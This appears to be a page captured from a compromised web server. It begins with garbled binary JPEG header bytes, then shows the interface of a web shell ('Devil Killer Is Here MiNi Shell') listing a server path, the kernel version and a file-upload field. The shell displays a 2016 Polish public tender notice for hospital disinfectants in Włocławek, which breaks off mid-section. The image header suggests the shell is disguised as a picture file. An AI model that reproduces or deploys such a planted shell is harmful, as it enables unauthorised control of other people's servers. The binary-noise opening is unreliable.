JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160324/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160324/67528-N-2016.html

<p class="kh_header"><b>Włocławek: ZP/03/2016 Sukcesywna dostawa środków dezynfekcyjnych i myjących dla MZOZ Sp. z o. o. we Włocławku, z podziałem na 8 pakietów</b><br>
<b>Numer ogłoszenia: 67528 - 2016; data zamieszczenia: 24.03.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zespół Opieki Zdrowotnej Sp. z o.o. , ul. Kilińskiego 16, 87-800 Włocławek, woj. kujawsko-pomorskie, tel. 054 231 10 33, faks 054 232 56 15.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.mzoz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka z o. o..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZP/03/2016 Sukcesywna dostawa środków dezynfekcyjnych i myjących dla MZOZ Sp. z o. o. we Włocławku, z podziałem na 8 pakietów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> PAKIET 1 - PIELĘGNACJA SKÓRY, ODKAŻANIE SKÓRY I RĄK

Preparat do pielęgnacji skóry rąk i ciała, do codziennego stosowania po dezynfekcji rąk, do regeneracji naskórka, postać emulsji wody w oleju, nie zawierający parabenów, barwników, kompatybilny z preparatem do 
dezynfekcji rąk, pH neutralne dla skóry, przebadany dermatologicznie. 
Opakowanie: 500 ml - 200 Szt.
Preparat alkoholowy do chirurgicznej i higienicznej dezynfekcji rąk. Bez zawartości jodu. Zawierający składniki natłuszczające i nawilżające. Gotowy do użycia. Spektrum działania: B, Tbc, MRSA, F, V (HIV, HBV, HCV, 
Polio, Adeno, Noro, Rota, Vaccinia, Herpes simplex). Czas dezynfekcji od 30 sek. do  90 sek. Produkt leczniczy. Opakowanie: 500 ml. Preparat pasujący do dozowników typu Dermados. - 340 Szt.
Preparat alkoholowy do chirurgicznej i higienicznej dezynfekcji rąk. Bez zawartości jodu. Zawierający składniki natłuszczające i nawilżające. Gotowy do użycia. Spektrum działania: B, Tbc, MRSA, F, V (HIV, HBV, HCV, 
Polio, Adeno, Noro, Rota, Vaccinia, Herpes simplex). Czas dezynfekcji od 30sek. do  90 sek. Produkt leczniczy. Opakowanie: 100 ml. Zamawiający wyraża zgodę na zaoferowanie preparatu w opakowaniach 75 ml z 
odpowiednim przeliczeniem ilości wskazanego przedmiotu zamówienia. - 80 Szt.
Preparat do odkażania skóry przed zabiegami, w postaci roztworu gotowego do użycia, zawierający mieszaninę alkoholi (etanolu, izopropanolu, benzylolu) oraz nadtlenek wodoru, bezbarwny, klarowny, aktywny wobec 
wszystkich mikroorganizmów i przetrwalników oraz wirusów w ciągu maks. 2 minut, przeznaczony do odkażania skóry przed zabiegami chirurgicznymi, iniekcjami, pobraniem krwi. Nie posiadający przeciwskazań do 
zastosowania u noworodków. Opakowanie: 500 ml z atomizerem. Zamawiający wyraża zgodę na zaoferowanie preparatu w opakowaniach o mniejszej pojemności z odpowiednim przeliczeniem ilości wskazanego przedmiotu zamówienia. - 200 Szt.
Preparat do odkażania skóry przed zabiegami, w postaci roztworu gotowego do użycia, zawierający mieszaninę alkoholi (etanolu, izopropanolu, benzylolu) oraz nadtlenek wodoru, bezbarwny, klarowny, aktywny wobec 
wszystkich mikroorganizmów i przetrwalników oraz wirusów w ciągu maks. 2 minut, przeznaczony do odkażania skóry przed zabiegami chirurgicznymi, iniekcjami, pobraniem krwi. Nie posiadający przeciwskazań do  
zastosowania u noworodków. Opakowanie: 1 litr. - 50 Szt.
Preparat w do profilaktyki przeciwgrzybicznej do dezynfekcji stóp, redukujący ryzyko infekcji grzybiczej skóry. Na bazie alkoholi i nadtlenku wodoru. Aktywny  w stosunku do grzybów i bakterii. Opakowanie: 350 ml z 
atomizerem. Zamawiający wyraża zgodę na zaoferowanie preparatu w opakowaniach 250 ml z odpowiednim przeliczeniem ilości wskazanego przedmiotu zamówienia - 10 Szt.

PAKIET 2 - ŚRODKI DO MYCIA I DEZYNFEKCJI DUŻYCH POWIERZCHNI

Preparat do dezynfekcji i mycia powierzchni i urządzeń sanitarnych, uwalniający aktywny chlor, w postaci rozpuszczalnych tabletek, aktywny wobec wszystkich mikroorganizmów i przetrwalników (w stężeniu 1 000 ppm 
Cl w ciągu 15 minut), w tym M. tuberculosis, C. difficile ( w stężeniu 10 000 ppm Cl w ciągu 15 minut), oraz wirusów (w tym Adeno, Polio, żółtaczki i HIV), przeznaczony również do mycia i dezynfekcji powierzchni 
zanieczyszczonych organicznie (w stężeniu 10 000 ppm CL w ciągu 15 minut) oraz powierzchni i urządzeń mających kontakt z żywnością. 
Opakowanie: minimalnie 150 tabletek - w przypadku zaoferowania opakowania o większej ilości tabletek Zamawiający wymaga odpowiedniego przeliczenia ilości wskazanego przedmiotu zamówienia. - 100 Szt.
Preparat do dezynfekcji dużych powierzchni, w postaci koncentratu, alkoholowy, z ewentualnym dodatkiem amin trzeciorzędowych i chlorku benzalkoniowego oraz substancji myjących, o szerokim spektrum, aktywny 
wobec bakterii (również Mycobacterium), drożdży, wirusów (również osłoniętych) w stężeniu 1% w czasie do 15 min.  Dopuszczony do stosowania na oddziałach noworodkowych i pediatrycznych, w obecności 
pacjentów oraz do powierzchni kontaktujących się z żywnością. 
Opakowanie: minimum 1 litr. - 50 Szt.

PAKIET 3 - ŚRODKI DO SZYBKIEGO MYCIA I DEZYNFEKCJI POWIERZCHNI

Preparat  alkoholowy przeznaczony do szybkiej dezynfekcji małych powierzchni i miejsc trudno dostępnych, gotowy do użycia. Nie zawierający aldehydów, QAV i pochodnych biguanidyny. Zawierający min. 3 subst. aktywne. Wymagana pozytywna opinia kliniczna IMiDz (lub instytutu równoważnego) do stosowania na oddziałach pediatrycznych. B,F - 1 min. Tbc - 5 min. V (HBV,HIV, Rota, Adeno) - 1 min. Pojemnik z atomizerem o pojemności: 1 litr. - 500 Szt.
Bezalkoholowe chusteczki do dezynfekcji powierzchni o właściwościach dezynfekcyjno - myjących, przeznaczone do stosowania na wszystkich powierzchniach i sprzętach medycznych (łącznie z głowicami USG) 
wrażliwych na działanie alkoholi. Nasączone roztworem QAV, wolne od aldehydów. Szerokie spektrum działania B, F, V(HIV, HBV, HCV, Noro). Czas działania - 1 min. Minimalny wymiar pojedynczej chusteczki do: 220 
mm. Opakowanie: 200 szt. chusteczek w pojemniku.
Zamawiający wyraża zgodę na zaoferowanie przedmiotu zamówienia zawierającego w pojemniku mniejsza ilość chusteczek /minimalnie: 100 szt./ z odpowiednim przeliczeniem ilości wskazanego przedmiotu 
zamówienia. - 50 Szt.
Bezalkoholowe chusteczki do dezynfekcji powierzchni o właściwościach dezynfekcyjno - myjących, przeznaczone do stosowania na wszystkich powierzchniach i sprzętach medycznych (łącznie z głowicami USG), 
wrażliwych na działanie alkoholi. Nasączone roztworem QAV, wolne od aldehydów. Szerokie spektrum działania B, F, V(HIV, HBV, HCV, Noro). Czas działania - 1 min. Minimalny wymiar pojedynczej chusteczki do 220 
mm. Wkłady uzupełniające. Opakowanie: 200 szt. chusteczek.
Zamawiający wyraża zgodę na zaoferowanie przedmiotu zamówienia zawierającego w pojemniku mniejsza ilość chusteczek /minimalnie: 100 szt./ z odpowiednim przeliczeniem ilości wskazanego przedmiotu zamówienia. - 50 Szt.

PAKIET 4 - ŚRODKI DO MANUALNEJ DEZYNFEKCJI NARZĘDZI

Preparat bezaldehydowy do mycia i dezynfekcji narzędzi medycznych, w postaci proszku do sporządzenia roztworu, na bazie aktywnego tlenu in statu nascendi, nie wymagający aktywatora, aktywny wobec wszystkich 
mikroorganizmów, ich przetrwalników  (w tym M. tuberculosis), oraz wirusów (w tym Polio, Adeno, Rota, Papova, HIV, żółtaczki) w ciągu 30 minut, przeznaczony do mycia i dezynfekcji narzędzi medycznych 
wykonanych z metalu, tworzyw sztucznych, szkła, gumy, oraz endoskopów medycznych. Opakowanie: 2 kg - w przypadku zaoferowania opakowania o mniejszej wadze /minimum: 1 kg/ Zamawiający wymaga odpowiedniego przeliczenia ilości wskazanego przedmiotu zamówienia. - 55 Szt.

PAKIET 5 - ŚRODKI DO MANUALNEJ DEZYNFEKCJI WIERTEŁ STOMATOLOGICZNYCH

Preparat do dezynfekcji i czyszczenia wierteł stomatologicznych i precyzyjnych narzędzi obrotowych. Na bazie alkoholi i wodorotlenku potasu. Bez zawartości związków amoniowych i aldehydów. Nie wymagający spłukiwania narzędzi wodą po przeprowadzonej dezynfekcji. Spektrum działania B, Tbc, F, V (Polio, HBV, HIV, HCV, Papova, Adeno, Vaccinia) w czasie do 30 minut. Gotowy do użycia. Bez aktywatora. Wyrób medyczny. Opakowanie: 2 litry. - 30 Szt.

PAKIET 6 - ŚRODKI DO ANTYSEPTYKI

Preparat do dezynfekcji błon śluzowych; substancja aktywna dichlorowodorek octenidyny, gotowy do użycia. Spektrum działania B (łącznie z MRSA, Chlamydia trachomatis), F, V(HIV, HBV, HCV). Czas działania: 60 sek. Wielkość opakowania: 50 ml - 150 Szt.
Preparat do dezynfekcji błon śluzowych; substancja aktywna dichlorowodorek octenidyny, gotowy do użycia. Spektrum działania B (łącznie z MRSA, Chlamydia trachomatis), F, V(HIV, HBV, HCV). Czas działania: 60 sek. Wielkość opakowania: 250 ml - 100 Szt.

PAKIET 7 - ŚRODKI DO ZMYWAREK I POZOSTAŁYCH MASZYN MYJĄCYCH

Uniwersalny płyn myjący, silnie zasadowy, z aktywnym chlorem. Skutecznie usuwający resztki zaschniętego jedzenia oraz wszelkiego rodzaju przebarwienia. Odpowiedni do wszystkich naczyń i sztućców wykonanych 
ze szkła, porcelany, plastiku i stali nierdzewnej. Do stosowania we wszystkich typach zmywarek. Opakowanie: 12 kg - 5 Opakowań
Sól do filtra - preparat chroniący zmywarkę przed osadzaniem się kamienia w jej wnętrzu i na mytych naczyniach. zmiękczający wodę,  zawierający całkowicie rozpuszczalną szlachetną sól z granulkami o odpowiedniej 
wielkości. Preparat kompatybilny ze uniwersalnym płynem myjącym i z płynem nabłyszczającym. Opakowanie: 25 kg - 4 Opakowania
Środek do maszynowego mycia podłóg, typu TOP EFEKT STR - lub równoważny, stosowany do powierzchni elastycznych oraz żywicznych, niskopieniący, alkaliczny, rozpuszczający zanieczyszczenia pochodzenia 
tłuszczowego i olejowego, pH 13. Opakowanie: 10 litrów. - 3 Opakowania
Środek myjąco-pielęgnujący na bazie alkoholu, do maszynowego mycia podłóg, typu TOP EFEKT - lub równoważny, stosowany do powierzchni polimerowych, posadzek wodoodpornych oraz powierzchni półmatowych. Środek o przyjemnym zapachu, szybkoschnący, nie pozostawiający smug i zacieków, pH 8. Opakowanie: 10 litrów. - 2 Opakowania

PAKIET 8 - ŚRODKI DO MASZYNOWEGO MYCIA I DEZYNFEKCJI SPRZĘTU MEDYCZNEGO W MYJNIACH I DEZYNFEKATORACH

Płyn płucząco-odkamieniający typu Doyen SK 22E  - lub równoważny, o lekko kwaśnym odczynie, zapobiegający osadzaniu się kamienia w naczyniach, komorze płuczącej i przewodach rurowych. Skuteczny przy wszystkich stopniach twardości wody. Do stosowania w urządzeniach dezynfekcyjnych i czyszczących z dezynfekcją termiczną. Spełnia zalecenia Zarządzenia Unii Europejskiej o detergentach 648/2004/EG oraz ustawy o środkach myjąco-czyszczących (WRMG). Nie zawiera fosforanów i fosfonianów. 
Opakowanie: 5 litrów. - 5 Opakowań.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający zgodnie z zapisem art. 34 ust. 5 ustawy przewiduje możliwość zastosowania prawa opcji. Zamawiający w celu prawidłowego określenia poziomu i zakresu zamówienia, obarczonego jak najmniejszym błędem porównał wielkości przedmiotowego zamówienia do analogicznych kontraktów i wyników ich realizacji z poprzedniego roku przyjmując jako punkt wyjścia zbliżoną sytuację w okresie realizacji przedmiotu zamówienia objętego niniejszym postępowaniem, jednakże w  przypadku jeśli w trakcie realizacji zamówienia okaże się, iż wymagane jest zapewnienia dodatkowych produktów do dezynfekcji i mycia, niezbędnych do realizacji świadczonych przez Zamawiającego usług medycznych, wynikającego i uzasadnionego liczbą i specyfiką wykonywanych przez Zamawiającego zabiegów medycznych, których liczba nie jest w dniu rozpisania postępowania, jak i zawarcia umowy Zamawiającemu, znana oraz uwzględniające uwarunkowania wynikające z podpisanych kontraktów z Narodowym Funduszem Zdrowia w stosunku do przewidzianego w Szczegółowym opisie przedmiotu zamówienia Zamawiający pozostawia sobie możliwość skorzystania z prawa opcji i zamówienia dodatkowych produktów, za które Wykonawcy będzie przysługiwało odrębne wynagrodzenie. W przypadku konieczności zamówienia dodatkowej ilości produktów wskazanych w SIWZ, rozliczenie będzie następowało na podstawie cen jednostkowych ujętych w formularzu ofertowo-cenowym stanowiącym załącznik do SIWZ.
Natomiast w przypadku zamówienia środków dezynfekcyjnych i myjących nieujętych w SIWZ, rozliczenie będzie następowało na podstawie średnich cen rynkowych. Całkowite wynagrodzenie Wykonawcy za dostarczenie (zapewnienie) i obsługę dodatkowego sprzętu objętego prawem opcji nie może przekroczyć 20% wynagrodzenia Wykonawcy za wykonanie podstawowego zakresu przedmiotu zamówienia</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wskazuje w tym zakresie szczegółowych warunków. Ocena spełnienia warunku, posiadania uprawnień, nastąpi w oparciu o przedstawione przez Wykonawcę odpowiednie oświadczenie. Zamawiający uzna warunek za spełniony, jeżeli Wykonawca złoży oświadczenie (wg wzoru stanowiącego Załącznik nr 2 do SIWZ) o spełnieniu warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca złoży oświadczenie (wg wzoru stanowiącego Załącznik nr 2 do SIWZ) o spełnieniu warunku, oraz gdy Wykonawca wykaże się wykonaniem, a w przypadku świadczeń okresowych lub ciągłych również wykonywaniem, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 3 dostaw odpowiadających swym zakresem przedmiotowi zamówienia - tj. dostawie środków dezynfekcyjnych     i myjących, odpowiadających łącznej wartości nie mniejszej niż 75 000,00 zł za oferowany przedmiot zamówienia (wg wzoru stanowiącego Załącznik Nr 6 do SIWZ).
Wykaz powinien zawierać: wskazane dostawy wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których zostały wykonane/wykonywane wraz z dowodami, iż zostały wykonane lub są wykonywane należycie. W celu zweryfikowania rzetelności, kwalifikacji, efektywności i doświadczenia Zamawiający żąda wskazania w wykazie informacji o dostawach, tożsamych z przedmiotem zamówienia,  niewykonanych lub wykonanych nienależycie - jeśli miały one miejsce - umożliwiających Zamawiającemu weryfikację pod kątem wskazanych wymagań. Z informacji Wykonawcy winno wynikać jakie były przyczyny, i po której stronie leżały, które doprowadziły do niewykonania lub nienależytego wykonania każdej  z takich wymienionych dostaw</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wskazuje w tym zakresie szczegółowych warunków. Ocena spełnienia warunku, posiadania uprawnień, nastąpi w oparciu o przedstawione przez Wykonawcę odpowiednie oświadczenie. Zamawiający uzna warunek za spełniony, jeżeli Wykonawca złoży oświadczenie (wg wzoru stanowiącego Załącznik nr 2 do SIWZ) o spełnieniu warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wskazuje w tym zakresie szczegółowych warunków. Ocena spełnienia warunku, posiadania uprawnień, nastąpi w oparciu o przedstawione przez Wykonawcę odpowiednie oświadczenie. Zamawiający uzna warunek za spełniony, jeżeli Wykonawca złoży oświadczenie (wg wzoru stanowiącego Załącznik nr 2 do SIWZ) o spełnieniu warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany przez Zamawiającego za spełniony, gdy Wykonawca złoży oświadczenie wg Załącznika Nr 2 do SIWZ oraz gdy Wykonawca przedstawi potwierdzenie posiadania ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej /opłacona polisa ubezpieczeniowa, a w przypadku jej braku, inny dokument potwierdzający/.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>W celu zweryfikowania rzetelności, kwalifikacji, efektywności i doświadczenia Zamawiający żąda wskazania w wykazie informacji o dostawach, tożsamych     z przedmiotem zamówienia,  niewykonanych lub wykonanych nienależycie - jeśli miały one miejsce - umożliwiających Zamawiającemu weryfikację pod kątem wskazanych wymagań. Z informacji Wykonawcy winno wynikać jakie były przyczyny, i po której stronie leżały, które doprowadziły do niewykonania lub nienależytego wykonania każdej  z takich wymienionych dostaw;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

